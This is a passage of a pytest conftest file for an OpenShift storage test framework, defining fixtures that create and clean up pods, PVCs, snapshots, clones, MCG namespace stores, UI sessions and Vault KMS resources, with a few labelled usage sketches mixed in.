log.info(f"Measurement dir {measurement_dir} doesn't exist. Creating it.")
os.mkdir(measurement_dir)
return measurement_dir
@pytest.fixture()
def multi_dc_pod(multi_pvc_factory, dc_pod_factory, service_account_factory):
"""
Prepare multiple dc pods for the test
Returns:
list: Pod instances
"""
def factory(
num_of_pvcs=1,
pvc_size=100,
project=None,
access_mode="RWO",
pool_type="rbd",
timeout=60,
):
dict_modes = {
"RWO": "ReadWriteOnce",
"RWX": "ReadWriteMany",
"RWX-BLK": "ReadWriteMany-Block",
}
dict_types = {"rbd": "CephBlockPool", "cephfs": "CephFileSystem"}
# Use exact matches so a plain 'RWX' rbd request is not treated as block mode
if access_mode == "RWX-BLK" and pool_type == "rbd":
modes = dict_modes["RWX-BLK"]
create_rbd_block_rwx_pod = True
else:
modes = dict_modes[access_mode]
create_rbd_block_rwx_pod = False
pvc_objs = multi_pvc_factory(
interface=dict_types[pool_type],
access_modes=[modes],
size=pvc_size,
num_of_pvc=num_of_pvcs,
project=project,
timeout=timeout,
)
dc_pods = []
dc_pods_res = []
sa_obj = service_account_factory(project=project)
with ThreadPoolExecutor() as p:
for pvc_obj in pvc_objs:
if create_rbd_block_rwx_pod:
dc_pods_res.append(
p.submit(
dc_pod_factory,
interface=constants.CEPHBLOCKPOOL,
pvc=pvc_obj,
raw_block_pv=True,
sa_obj=sa_obj,
)
)
else:
dc_pods_res.append(
p.submit(
dc_pod_factory,
interface=dict_types[pool_type],
pvc=pvc_obj,
sa_obj=sa_obj,
)
)
for dc in dc_pods_res:
pod_obj = dc.result()
if create_rbd_block_rwx_pod:
log.info(
"#### setting attribute pod_type since "
f"create_rbd_block_rwx_pod = {create_rbd_block_rwx_pod}"
)
setattr(pod_obj, "pod_type", "rbd_block_rwx")
else:
setattr(pod_obj, "pod_type", "")
dc_pods.append(pod_obj)
with ThreadPoolExecutor() as p:
for dc in dc_pods:
p.submit(
helpers.wait_for_resource_state,
resource=dc,
state=constants.STATUS_RUNNING,
timeout=120,
)
return dc_pods
return factory
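# Illustrative usage sketch (hypothetical values, not part of the original
# fixtures): creating two RBD-backed DC pods through the factory returned by
# multi_dc_pod above. 'project_factory' is the project fixture already
# referenced earlier in this module.
def _example_multi_dc_pod_usage(multi_dc_pod, project_factory):
    project = project_factory()
    return multi_dc_pod(
        num_of_pvcs=2,
        pvc_size=10,
        project=project,
        access_mode="RWO",
        pool_type="rbd",
    )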
@pytest.fixture(scope="session")
def htpasswd_path(tmpdir_factory):
"""
Returns:
string: Path to HTPasswd file with additional usernames
"""
return str(tmpdir_factory.mktemp("idp_data").join("users.htpasswd"))
@pytest.fixture(scope="session")
def htpasswd_identity_provider(request):
"""
Creates HTPasswd Identity provider.
Returns:
object: OCS object representing OCP OAuth object with HTPasswd IdP
"""
users.create_htpasswd_idp()
cluster = OCS(kind=constants.OAUTH, metadata={"name": "cluster"})
cluster.reload()
def finalizer():
"""
Remove HTPasswd IdP
"""
# TODO(fbalak): remove HTPasswd identityProvider
# cluster.ocp.patch(
# resource_name='cluster',
# params=f'[{ "op": "remove", "path": "/spec/identityProviders" }]'
# )
# users.delete_htpasswd_secret()
request.addfinalizer(finalizer)
return cluster
@pytest.fixture(scope="function")
def user_factory(request, htpasswd_identity_provider, htpasswd_path):
return users.user_factory(request, htpasswd_path)
@pytest.fixture(scope="session")
def user_factory_session(request, htpasswd_identity_provider, htpasswd_path):
return users.user_factory(request, htpasswd_path)
@pytest.fixture(autouse=True)
def log_alerts(request):
"""
Log alerts at the beginning and end of each test case. At the end of test
case print a difference: what new alerts are in place after the test is
complete.
"""
teardown = config.RUN["cli_params"].get("teardown")
dev_mode = config.RUN["cli_params"].get("dev_mode")
if teardown:
return
elif dev_mode:
log.info("Skipping alert check for development mode")
return
alerts_before = []
prometheus = None
try:
prometheus = PrometheusAPI()
except Exception:
log.exception("There was a problem with connecting to Prometheus")
def _collect_alerts():
try:
alerts_response = prometheus.get(
"alerts", payload={"silenced": False, "inhibited": False}
)
if alerts_response.ok:
alerts = alerts_response.json().get("data").get("alerts")
log.debug(f"Found alerts: {alerts}")
return alerts
else:
log.warning(
f"There was a problem with collecting alerts for analysis: {alerts_response.text}"
)
return False
except Exception:
log.exception("There was a problem with collecting alerts for analysis")
return False
def _print_diff():
if alerts_before:
alerts_after = _collect_alerts()
if alerts_after:
alerts_new = [
alert for alert in alerts_after if alert not in alerts_before
]
if alerts_new:
log.warning("During test were raised new alerts")
log.warning(alerts_new)
alerts_before = _collect_alerts()
request.addfinalizer(_print_diff)
@pytest.fixture(scope="session", autouse=True)
def ceph_toolbox(request):
"""
This fixture creates the ceph toolbox pod for manually created deployments,
if it does not already exist.
"""
deploy = config.RUN["cli_params"]["deploy"]
teardown = config.RUN["cli_params"].get("teardown")
skip_ocs = config.ENV_DATA["skip_ocs_deployment"]
deploy_teardown = deploy or teardown
ocp_dedicated = (
config.ENV_DATA["platform"].lower() == constants.OPENSHIFT_DEDICATED_PLATFORM
)
if not (deploy_teardown or skip_ocs) or (ocp_dedicated and not deploy_teardown):
try:
# Creating toolbox pod
setup_ceph_toolbox()
except CommandFailed:
log.info("Failed to create toolbox")
@pytest.fixture(scope="function")
def node_drain_teardown(request):
"""
Tear down function after Node drain
"""
def finalizer():
"""
Make sure that all cluster's nodes are in 'Ready' state and if not,
change them back to 'Ready' state by marking them as schedulable
"""
scheduling_disabled_nodes = [
n.name
for n in get_node_objs()
if n.ocp.get_resource_status(n.name)
== constants.NODE_READY_SCHEDULING_DISABLED
]
if scheduling_disabled_nodes:
schedule_nodes(scheduling_disabled_nodes)
ceph_health_check(tries=60)
request.addfinalizer(finalizer)
@pytest.fixture(scope="function")
def node_restart_teardown(request, nodes):
"""
Make sure all nodes are up and in 'Ready' state and if not,
try to make them 'Ready' by restarting the nodes.
"""
def finalizer():
# Start the powered off nodes
nodes.restart_nodes_by_stop_and_start_teardown()
try:
node.wait_for_nodes_status(status=constants.NODE_READY)
except ResourceWrongStatusException:
# Restart the nodes if in NotReady state
not_ready_nodes = [
n
for n in node.get_node_objs()
if n.ocp.get_resource_status(n.name) == constants.NODE_NOT_READY
]
if not_ready_nodes:
log.info(
f"Nodes in NotReady status found: {[n.name for n in not_ready_nodes]}"
)
nodes.restart_nodes_by_stop_and_start(not_ready_nodes)
node.wait_for_nodes_status(status=constants.NODE_READY)
request.addfinalizer(finalizer)
@pytest.fixture()
def mcg_connection_factory(request, mcg_obj, cld_mgr):
"""
Create a new MCG connection for given platform. If there already exists
a connection for the platform then return this previously created
connection.
"""
created_connections = {}
def _create_connection(platform=constants.AWS_PLATFORM, name=None):
"""
Args:
platform (str): Platform used for connection
name (str): New connection name. If not provided then new name will
be generated. The new name will be used only if there is no
existing connection for the given platform
Returns:
str: connection name
"""
if platform not in created_connections:
connection_name = name or create_unique_resource_name(
constants.MCG_CONNECTION, platform
)
mcg_obj.create_connection(cld_mgr, platform, connection_name)
created_connections[platform] = connection_name
return created_connections[platform]
def _connections_cleanup():
for platform in created_connections:
mcg_obj.delete_ns_connection(created_connections[platform])
request.addfinalizer(_connections_cleanup)
return _create_connection
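# Illustrative usage sketch (hypothetical, not part of the original fixtures):
# creating (or reusing) an MCG connection for the AWS platform via the factory
# returned by mcg_connection_factory above.
def _example_mcg_connection_usage(mcg_connection_factory):
    return mcg_connection_factory(platform=constants.AWS_PLATFORM)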
@pytest.fixture()
def ns_resource_factory(
request, mcg_obj, cld_mgr, cloud_uls_factory, mcg_connection_factory
):
"""
Create a namespace resource factory. Calling this fixture creates a new namespace resource.
"""
created_ns_resources = []
def _create_ns_resources(platform=constants.AWS_PLATFORM):
# Create random connection_name
rand_connection = mcg_connection_factory(platform)
# Create the actual namespace resource
rand_ns_resource = create_unique_resource_name(
constants.MCG_NS_RESOURCE, platform
)
if platform == constants.RGW_PLATFORM:
region = None
else:
# TODO: fix this when https://github.com/red-hat-storage/ocs-ci/issues/3338
# is resolved
region = "us-east-2"
target_bucket_name = mcg_obj.create_namespace_resource(
rand_ns_resource,
rand_connection,
region,
cld_mgr,
cloud_uls_factory,
platform,
)
log.info(f"Check validity of NS resource {rand_ns_resource}")
if platform == constants.AWS_PLATFORM:
endpoint = constants.MCG_NS_AWS_ENDPOINT
elif platform == constants.AZURE_PLATFORM:
endpoint = constants.MCG_NS_AZURE_ENDPOINT
elif platform == constants.RGW_PLATFORM:
rgw_conn = RGW()
endpoint, _, _ = rgw_conn.get_credentials()
else:
raise UnsupportedPlatformError(f"Unsupported Platform: {platform}")
mcg_obj.check_ns_resource_validity(
rand_ns_resource, target_bucket_name, endpoint
)
created_ns_resources.append(rand_ns_resource)
return target_bucket_name, rand_ns_resource
def ns_resources_cleanup():
for ns_resource in created_ns_resources:
mcg_obj.delete_ns_resource(ns_resource)
request.addfinalizer(ns_resources_cleanup)
return _create_ns_resources
@pytest.fixture()
def namespace_store_factory(request, cld_mgr, mcg_obj, cloud_uls_factory):
"""
Create a Namespace Store factory.
Calling this fixture creates a new Namespace Store(s).
Returns:
func: Factory method - each call to this function creates
a namespacestore
"""
return namespacestore_factory_implementation(
request, cld_mgr, mcg_obj, cloud_uls_factory
)
@pytest.fixture(scope="session")
def namespace_store_factory_session(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
):
"""
Create a Namespace Store factory.
Calling this fixture creates a new Namespace Store(s).
Returns:
func: Factory method - each call to this function creates
a namespacestore
"""
return namespacestore_factory_implementation(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
)
@pytest.fixture()
def snapshot_factory(request):
"""
Snapshot factory. Calling this fixture creates a volume snapshot from the
specified PVC
"""
instances = []
def factory(pvc_obj, wait=True, snapshot_name=None):
"""
Args:
pvc_obj (PVC): PVC object from which snapshot has to be created
wait (bool): True to wait for snapshot to be ready, False otherwise
snapshot_name (str): Name to be provided for snapshot
Returns:
OCS: OCS instance of kind VolumeSnapshot
"""
snap_obj = pvc_obj.create_snapshot(snapshot_name=snapshot_name, wait=wait)
instances.append(snap_obj)
return snap_obj
def finalizer():
"""
Delete the snapshots
"""
snapcontent_objs = []
# Get VolumeSnapshotContent from VolumeSnapshots and delete
# VolumeSnapshots
for instance in instances:
if not instance.is_deleted:
snapcontent_objs.append(
helpers.get_snapshot_content_obj(snap_obj=instance)
)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for VolumeSnapshotContents to be deleted
for snapcontent_obj in snapcontent_objs:
snapcontent_obj.ocp.wait_for_delete(
resource_name=snapcontent_obj.name, timeout=240
)
request.addfinalizer(finalizer)
return factory
@pytest.fixture()
def multi_snapshot_factory(snapshot_factory):
"""
Snapshot factory. Calling this fixture creates volume snapshots of each
PVC in the provided list
"""
def factory(pvc_obj, wait=True, snapshot_name_suffix=None):
"""
Args:
pvc_obj (list): List of PVC objects from which snapshots have to be created
wait (bool): True to wait for snapshot to be ready, False otherwise
snapshot_name_suffix (str): Suffix to be added to snapshot
Returns:
list: OCS instances of kind VolumeSnapshot
"""
snapshot = []
for obj in pvc_obj:
log.info(f"Creating snapshot of PVC {obj.name}")
snapshot_name = (
f"{obj.name}-{snapshot_name_suffix}" if snapshot_name_suffix else None
)
snap_obj = snapshot_factory(
pvc_obj=obj, snapshot_name=snapshot_name, wait=wait
)
snapshot.append(snap_obj)
return snapshot
return factory
@pytest.fixture()
def snapshot_restore_factory(request):
"""
Snapshot restore factory. Calling this fixture creates new PVC out of the
specified VolumeSnapshot.
"""
instances = []
def factory(
snapshot_obj,
restore_pvc_name=None,
storageclass=None,
size=None,
volume_mode=None,
restore_pvc_yaml=None,
access_mode=constants.ACCESS_MODE_RWO,
status=constants.STATUS_BOUND,
):
"""
Args:
snapshot_obj (OCS): OCS instance of kind VolumeSnapshot which has
to be restored to new PVC
restore_pvc_name (str): Name to be provided for restored pvc
storageclass (str): Name of storageclass
size (str): Size of PVC being created. eg: 5Gi. Ideally, this
should be same as the restore size of snapshot. Adding this
parameter to consider negative test scenarios.
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC.
restore_pvc_yaml (str): The location of pvc-restore.yaml
access_mode (str): This decides the access mode to be used for the
PVC. ReadWriteOnce is default.
status (str): If provided then factory waits for the PVC to reach
desired state.
Returns:
PVC: Restored PVC object
"""
snapshot_info = snapshot_obj.get()
size = size or snapshot_info["status"]["restoreSize"]
restore_pvc_name = restore_pvc_name or (
helpers.create_unique_resource_name(snapshot_obj.name, "restore")
)
if snapshot_info["spec"]["volumeSnapshotClassName"] == (
helpers.default_volumesnapshotclass(constants.CEPHBLOCKPOOL).name
):
storageclass = (
storageclass
or helpers.default_storage_class(constants.CEPHBLOCKPOOL).name
)
restore_pvc_yaml = restore_pvc_yaml or constants.CSI_RBD_PVC_RESTORE_YAML
interface = constants.CEPHBLOCKPOOL
elif snapshot_info["spec"]["volumeSnapshotClassName"] == (
helpers.default_volumesnapshotclass(constants.CEPHFILESYSTEM).name
):
storageclass = (
storageclass
or helpers.default_storage_class(constants.CEPHFILESYSTEM).name
)
restore_pvc_yaml = restore_pvc_yaml or constants.CSI_CEPHFS_PVC_RESTORE_YAML
interface = constants.CEPHFILESYSTEM
restored_pvc = create_restore_pvc(
sc_name=storageclass,
snap_name=snapshot_obj.name,
namespace=snapshot_obj.namespace,
size=size,
pvc_name=restore_pvc_name,
volume_mode=volume_mode,
restore_pvc_yaml=restore_pvc_yaml,
access_mode=access_mode,
)
instances.append(restored_pvc)
restored_pvc.snapshot = snapshot_obj
restored_pvc.interface = interface
if status:
helpers.wait_for_resource_state(restored_pvc, status)
return restored_pvc
def finalizer():
"""
Delete the PVCs
"""
pv_objs = []
# Get PV from PVC instances and delete PVCs
for instance in instances:
if not instance.is_deleted:
pv_objs.append(instance.backed_pv_obj)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for PVs to delete
helpers.wait_for_pv_delete(pv_objs)
request.addfinalizer(finalizer)
return factory
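# Illustrative usage sketch (hypothetical, not part of the original fixtures):
# restoring a previously created VolumeSnapshot to a new PVC with the factory
# returned by snapshot_restore_factory above. 'snap_obj' stands in for a
# snapshot object created elsewhere, e.g. via snapshot_factory.
def _example_snapshot_restore_usage(snapshot_restore_factory, snap_obj):
    return snapshot_restore_factory(
        snapshot_obj=snap_obj,
        size="5Gi",
        access_mode=constants.ACCESS_MODE_RWO,
        status=constants.STATUS_BOUND,
    )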
@pytest.fixture()
def multi_snapshot_restore_factory(snapshot_restore_factory):
"""
Snapshot restore factory. Calling this fixture creates set of new PVC out of the
each VolumeSnapshot provided in the list.
"""
def factory(
snapshot_obj,
restore_pvc_suffix=None,
storageclass=None,
size=None,
volume_mode=None,
restore_pvc_yaml=None,
access_mode=constants.ACCESS_MODE_RWO,
status=constants.STATUS_BOUND,
wait_each=False,
):
"""
Args:
snapshot_obj (list): List of OCS instances of kind VolumeSnapshot which have
to be restored to new PVCs
restore_pvc_suffix (str): Suffix to be added to pvc name
storageclass (str): Name of storageclass
size (str): Size of PVC being created. eg: 5Gi. Ideally, this
should be same as the restore size of snapshot. Adding this
parameter to consider negative test scenarios.
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC.
restore_pvc_yaml (str): The location of pvc-restore.yaml
access_mode (str): This decides the access mode to be used for the
PVC. ReadWriteOnce is default.
status (str): If provided then factory waits for the PVC to reach
desired state.
wait_each(bool): True to wait for each PVC to be in status 'status'
before creating next PVC, False otherwise
Returns:
list: Restored PVC objects
"""
new_pvcs = []
status_tmp = status if wait_each else ""
for snap_obj in snapshot_obj:
log.info(f"Creating a PVC from snapshot {snap_obj.name}")
restore_pvc_name = (
f"{snap_obj.name}-{restore_pvc_suffix}" if restore_pvc_suffix else None
)
restored_pvc = snapshot_restore_factory(
snapshot_obj=snap_obj,
restore_pvc_name=restore_pvc_name,
storageclass=storageclass,
size=size,
volume_mode=volume_mode,
restore_pvc_yaml=restore_pvc_yaml,
access_mode=access_mode,
status=status_tmp,
)
restored_pvc.snapshot = snap_obj
new_pvcs.append(restored_pvc)
if status and not wait_each:
for restored_pvc in new_pvcs:
helpers.wait_for_resource_state(restored_pvc, status)
return new_pvcs
return factory
@pytest.fixture(scope="session", autouse=True)
def collect_logs_fixture(request):
"""
This fixture collects ocs logs after tier execution and this will allow
to see the cluster's status after the execution on all execution status options.
"""
def finalizer():
"""
Tracking both logs separately reduces the chance of collision
"""
if not config.RUN["cli_params"].get("deploy") and not config.RUN[
"cli_params"
].get("teardown"):
if config.REPORTING["collect_logs_on_success_run"]:
collect_ocs_logs("testcases", ocs=False, status_failure=False)
collect_ocs_logs("testcases", ocp=False, status_failure=False)
request.addfinalizer(finalizer)
def get_ready_noobaa_endpoint_count(namespace):
"""
Get the number of ready NooBaa endpoints
"""
pods_info = get_pods_having_label(
label=constants.NOOBAA_ENDPOINT_POD_LABEL, namespace=namespace
)
ready_count = 0
for ep_info in pods_info:
container_statuses = ep_info.get("status", {}).get("containerStatuses")
if container_statuses is not None and len(container_statuses) > 0:
if container_statuses[0].get("ready"):
ready_count += 1
return ready_count
@pytest.fixture(scope="function")
def nb_ensure_endpoint_count(request):
"""
Validate and ensure the number of running noobaa endpoints
"""
cls = request.cls
min_ep_count = cls.MIN_ENDPOINT_COUNT
max_ep_count = cls.MAX_ENDPOINT_COUNT
assert min_ep_count <= max_ep_count
namespace = defaults.ROOK_CLUSTER_NAMESPACE
should_wait = False
# prior to 4.6 we configured the ep count directly on the noobaa cr.
if float(config.ENV_DATA["ocs_version"]) < 4.6:
noobaa = OCP(kind="noobaa", namespace=namespace)
resource = noobaa.get()["items"][0]
endpoints = resource.get("spec", {}).get("endpoints", {})
if endpoints.get("minCount", -1) != min_ep_count:
log.info(f"Changing minimum Noobaa endpoints to {min_ep_count}")
params = f'{{"spec":{{"endpoints":{{"minCount":{min_ep_count}}}}}}}'
noobaa.patch(resource_name="noobaa", params=params, format_type="merge")
should_wait = True
if endpoints.get("maxCount", -1) != max_ep_count:
log.info(f"Changing maximum Noobaa endpoints to {max_ep_count}")
params = f'{{"spec":{{"endpoints":{{"maxCount":{max_ep_count}}}}}}}'
noobaa.patch(resource_name="noobaa", params=params, format_type="merge")
should_wait = True
else:
storage_cluster = OCP(kind=constants.STORAGECLUSTER, namespace=namespace)
resource = storage_cluster.get()["items"][0]
resource_name = resource["metadata"]["name"]
endpoints = (
resource.get("spec", {}).get("multiCloudGateway", {}).get("endpoints", {})
)
if endpoints.get("minCount", -1) != min_ep_count:
log.info(f"Changing minimum Noobaa endpoints to {min_ep_count}")
params = f'{{"spec":{{"multiCloudGateway":{{"endpoints":{{"minCount":{min_ep_count}}}}}}}}}'
storage_cluster.patch(
resource_name=resource_name, params=params, format_type="merge"
)
should_wait = True
if endpoints.get("maxCount", -1) != max_ep_count:
log.info(f"Changing maximum Noobaa endpoints to {max_ep_count}")
params = f'{{"spec":{{"multiCloudGateway":{{"endpoints":{{"maxCount":{max_ep_count}}}}}}}}}'
storage_cluster.patch(
resource_name=resource_name, params=params, format_type="merge"
)
should_wait = True
if should_wait:
# Wait for the NooBaa endpoint pods to stabilize
try:
for ready_nb_ep_count in TimeoutSampler(
300, 30, get_ready_noobaa_endpoint_count, namespace
):
if min_ep_count <= ready_nb_ep_count <= max_ep_count:
log.info(
f"NooBaa endpoints stabilized. Ready endpoints: {ready_nb_ep_count}"
)
break
log.info(
f"Waiting for the NooBaa endpoints to stabilize. "
f"Current ready count: {ready_nb_ep_count}"
)
except TimeoutExpiredError:
raise TimeoutExpiredError(
"NooBaa endpoints did not stabilize in time.\n"
f"Min count: {min_ep_count}, max count: {max_ep_count}, ready count: {ready_nb_ep_count}"
)
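# Illustrative usage sketch (hypothetical, not part of the original fixtures):
# a test class consuming the nb_ensure_endpoint_count fixture above must define
# the expected endpoint bounds as class attributes; the values below are
# assumptions for demonstration only.
class _ExampleEndpointBounds:
    MIN_ENDPOINT_COUNT = 1
    MAX_ENDPOINT_COUNT = 2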
@pytest.fixture()
def pvc_clone_factory(request):
"""
Calling this fixture creates a clone from the specified PVC
"""
instances = []
def factory(
pvc_obj,
status=constants.STATUS_BOUND,
clone_name=None,
storageclass=None,
size=None,
access_mode=None,
volume_mode=None,
):
"""
Args:
pvc_obj (PVC): PVC object from which clone has to be created
status (str): If provided then factory waits for cloned PVC to
reach the desired state
clone_name (str): Name to be provided for cloned PVC
storageclass (str): storage class to be used for cloned PVC
size (int): The requested size for the cloned PVC. This should
be same as the size of parent PVC for a successful clone
access_mode (str): This decides the access mode to be used for
the cloned PVC. eg: ReadWriteOnce, ReadOnlyMany, ReadWriteMany
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC
Returns:
PVC: PVC instance
"""
assert (
pvc_obj.provisioner in constants.OCS_PROVISIONERS
), f"Unknown provisioner in PVC {pvc_obj.name}"
if pvc_obj.provisioner == "openshift-storage.rbd.csi.ceph.com":
clone_yaml = constants.CSI_RBD_PVC_CLONE_YAML
interface = constants.CEPHBLOCKPOOL
elif pvc_obj.provisioner == "openshift-storage.cephfs.csi.ceph.com":
clone_yaml = constants.CSI_CEPHFS_PVC_CLONE_YAML
interface = constants.CEPHFILESYSTEM
size = size or pvc_obj.get().get("spec").get("resources").get("requests").get(
"storage"
)
storageclass = storageclass or pvc_obj.backed_sc
access_mode = access_mode or pvc_obj.get_pvc_access_mode
volume_mode = volume_mode or getattr(pvc_obj, "volume_mode", None)
# Create clone
clone_pvc_obj = pvc.create_pvc_clone(
sc_name=storageclass,
parent_pvc=pvc_obj.name,
clone_yaml=clone_yaml,
pvc_name=clone_name,
namespace=pvc_obj.namespace,
storage_size=size,
access_mode=access_mode,
volume_mode=volume_mode,
)
instances.append(clone_pvc_obj)
clone_pvc_obj.parent = pvc_obj
clone_pvc_obj.volume_mode = volume_mode
clone_pvc_obj.interface = interface
if status:
helpers.wait_for_resource_state(clone_pvc_obj, status)
return clone_pvc_obj
def finalizer():
"""
Delete the cloned PVCs
"""
pv_objs = []
# Get PV from PVC instances and delete PVCs
for instance in instances:
if not instance.is_deleted:
pv_objs.append(instance.backed_pv_obj)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for PVs to delete
helpers.wait_for_pv_delete(pv_objs)
request.addfinalizer(finalizer)
return factory
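# Illustrative usage sketch (hypothetical, not part of the original fixtures):
# cloning an existing PVC with the factory returned by pvc_clone_factory above.
# 'parent_pvc' stands in for a PVC object created elsewhere in a test.
def _example_pvc_clone_usage(pvc_clone_factory, parent_pvc):
    return pvc_clone_factory(pvc_obj=parent_pvc, status=constants.STATUS_BOUND)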
@pytest.fixture(scope="session", autouse=True)
def reportportal_customization(request):
if config.REPORTING.get("rp_launch_url"):
request.config._metadata["RP Launch URL:"] = config.REPORTING["rp_launch_url"]
elif hasattr(request.node.config, "py_test_service"):
rp_service = request.node.config.py_test_service
if not hasattr(rp_service.RP, "rp_client"):
request.config._metadata[
"RP Launch URL:"
] = "Problem with RP, launch URL is not available!"
return
launch_id = rp_service.RP.rp_client.launch_id
project = rp_service.RP.rp_client.project
endpoint = rp_service.RP.rp_client.endpoint
launch_url = f"{endpoint}/ui/#{project}/launches/all/{launch_id}/{launch_id}"
config.REPORTING["rp_launch_url"] = launch_url
config.REPORTING["rp_launch_id"] = launch_id
config.REPORTING["rp_endpoint"] = endpoint
config.REPORTING["rp_project"] = project
request.config._metadata["RP Launch URL:"] = launch_url
@pytest.fixture()
def multi_pvc_clone_factory(pvc_clone_factory):
"""
Calling this fixture creates clone from each PVC in the provided list of PVCs
"""
def factory(
pvc_obj,
status=constants.STATUS_BOUND,
clone_name=None,
storageclass=None,
size=None,
access_mode=None,
volume_mode=None,
wait_each=False,
):
"""
Args:
pvc_obj (list): List of PVC objects from which clones have to be created
status (str): If provided then factory waits for cloned PVC to
reach the desired state
clone_name (str): Name to be provided for cloned PVC
storageclass (str): storage class to be used for cloned PVC
size (int): The requested size for the cloned PVC. This should
be same as the size of parent PVC for a successful clone
access_mode (str): This decides the access mode to be used for
the cloned PVC. eg: ReadWriteOnce, ReadOnlyMany, ReadWriteMany
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC
wait_each(bool): True to wait for each PVC to be in status 'status'
before creating next PVC, False otherwise
Returns:
list: Cloned PVC instances
"""
cloned_pvcs = []
status_tmp = status if wait_each else ""
for obj in pvc_obj:
# Create clone
clone_pvc_obj = pvc_clone_factory(
pvc_obj=obj,
clone_name=clone_name,
storageclass=storageclass,
size=size,
access_mode=access_mode,
volume_mode=volume_mode,
status=status_tmp,
)
cloned_pvcs.append(clone_pvc_obj)
if status and not wait_each:
for cloned_pvc in cloned_pvcs:
helpers.wait_for_resource_state(cloned_pvc, status)
return cloned_pvcs
return factory
@pytest.fixture(scope="function")
def multiple_snapshot_and_clone_of_postgres_pvc_factory(
request,
multi_snapshot_factory,
multi_snapshot_restore_factory,
multi_pvc_clone_factory,
):
"""
Calling this fixture creates multiple snapshots & clone of postgres PVC
"""
instances = []
def factory(pvc_size_new, pgsql):
"""
Args:
pvc_size_new (int): New size to which the PVCs will be expanded
pgsql (obj): Pgsql obj
Returns:
list: Postgres pod instances
"""
# Get postgres pvc list obj
postgres_pvcs_obj = pgsql.get_postgres_pvc()
snapshots = multi_snapshot_factory(pvc_obj=postgres_pvcs_obj)
log.info("Created snapshots from all the PVCs and snapshots are in Ready state")
restored_pvc_objs = multi_snapshot_restore_factory(snapshot_obj=snapshots)
log.info("Created new PVCs from all the snapshots")
cloned_pvcs = multi_pvc_clone_factory(
pvc_obj=restored_pvc_objs, volume_mode=constants.VOLUME_MODE_FILESYSTEM
)
log.info("Created new PVCs from all restored volumes")
# Attach a new pgsql pod to the cloned PVCs
sset_list = pgsql.attach_pgsql_pod_to_claim_pvc(
pvc_objs=cloned_pvcs, postgres_name="postgres-clone", run_benchmark=False
)
instances.extend(sset_list)
# Resize cloned PVCs
for pvc_obj in cloned_pvcs:
log.info(f"Expanding size of PVC {pvc_obj.name} to {pvc_size_new}G")
pvc_obj.resize_pvc(pvc_size_new, True)
new_snapshots = multi_snapshot_factory(pvc_obj=cloned_pvcs)
log.info(
"Created snapshots from all the cloned PVCs"
" and snapshots are in Ready state"
)
new_restored_pvc_objs = multi_snapshot_restore_factory(
snapshot_obj=new_snapshots
)
log.info("Created new PVCs from all the snapshots and in Bound state")
# Attach a new pgsql pod to the restored PVCs
pgsql_obj_list = pgsql.attach_pgsql_pod_to_claim_pvc(
pvc_objs=new_restored_pvc_objs,
postgres_name="postgres-clone-restore",
run_benchmark=False,
)
instances.extend(pgsql_obj_list)
# Resize restored PVCs
for pvc_obj in new_restored_pvc_objs:
log.info(f"Expanding size of PVC {pvc_obj.name} to {pvc_size_new}G")
pvc_obj.resize_pvc(pvc_size_new, True)
return instances
def finalizer():
"""
Delete the list of pod objects created
"""
for instance in instances:
if not instance.is_deleted:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
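# --- Illustrative usage sketch (editor's addition) ---
# How a test might drive the snapshot/clone factory above. The `pgsql` fixture
# (a Postgresql helper exposing get_postgres_pvc() etc.) is assumed to be
# provided elsewhere in the framework.
def _example_postgres_snapshot_and_clone_usage(
    pgsql, multiple_snapshot_and_clone_of_postgres_pvc_factory
):
    # snapshot, restore, clone and expand the Postgres PVCs; returns the attached pods
    pgsql_pods = multiple_snapshot_and_clone_of_postgres_pvc_factory(
        pvc_size_new=25, pgsql=pgsql
    )
    assert pgsql_pods, "Expected at least one Postgres pod to be attached"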
@pytest.fixture()
def es(request):
"""
    Create an in-cluster Elasticsearch deployment for benchmark-operator tests.
    The name 'es' is used as a shortcut for Elasticsearch for simplicity.
"""
def teardown():
es.cleanup()
request.addfinalizer(teardown)
es = ElasticSearch()
return es
@pytest.fixture(scope="session")
def setup_ui_session(request):
return setup_ui_fixture(request)
@pytest.fixture(scope="class")
def setup_ui_class(request):
return setup_ui_fixture(request)
@pytest.fixture(scope="function")
def setup_ui(request):
return setup_ui_fixture(request)
def setup_ui_fixture(request):
driver = login_ui()
def finalizer():
close_browser(driver)
request.addfinalizer(finalizer)
return driver
@pytest.fixture(scope="session", autouse=True)
def load_cluster_info_file(request):
"""
    This fixture tries to load the cluster_info.json file if it exists (on
    clusters installed via Flexy) and applies the information to the config
    object (for example, information related to a disconnected cluster)
load_cluster_info()
@pytest.fixture(scope="function")
def ripsaw(request):
# Create benchmark Operator (formerly ripsaw)
ripsaw = RipSaw()
def teardown():
ripsaw.cleanup()
time.sleep(10)
request.addfinalizer(teardown)
return ripsaw
@pytest.fixture(scope="function")
def pv_encryption_kms_setup_factory(request):
"""
    Create vault resources and set up the csi-kms-connection-details configMap
"""
vault = KMS.Vault()
def factory(kv_version):
"""
Args:
kv_version(str): KV version to be used, either v1 or v2
Returns:
object: Vault(KMS) object
"""
vault.gather_init_vault_conf()
vault.update_vault_env_vars()
# Check if cert secrets already exist, if not create cert resources
ocp_obj = OCP(kind="secret", namespace=constants.OPENSHIFT_STORAGE_NAMESPACE)
try:
ocp_obj.get_resource(resource_name="ocs-kms-ca-secret", column="NAME")
except CommandFailed as cfe:
if "not found" not in str(cfe):
raise
else:
vault.create_ocs_vault_cert_resources()
# Create vault namespace, backend path and policy in vault
vault_resource_name = create_unique_resource_name("test", "vault")
vault.vault_create_namespace(namespace=vault_resource_name)
vault.vault_create_backend_path(
backend_path=vault_resource_name, kv_version=kv_version
)
vault.vault_create_policy(policy_name=vault_resource_name)
# If csi-kms-connection-details exists, edit the configmap to add new vault config
ocp_obj = OCP(kind="configmap", namespace=constants.OPENSHIFT_STORAGE_NAMESPACE)
try:
ocp_obj.get_resource(
resource_name="csi-kms-connection-details", column="NAME"
)
new_kmsid = vault_resource_name
vdict = defaults.VAULT_CSI_CONNECTION_CONF
for key in vdict.keys():
old_key = key
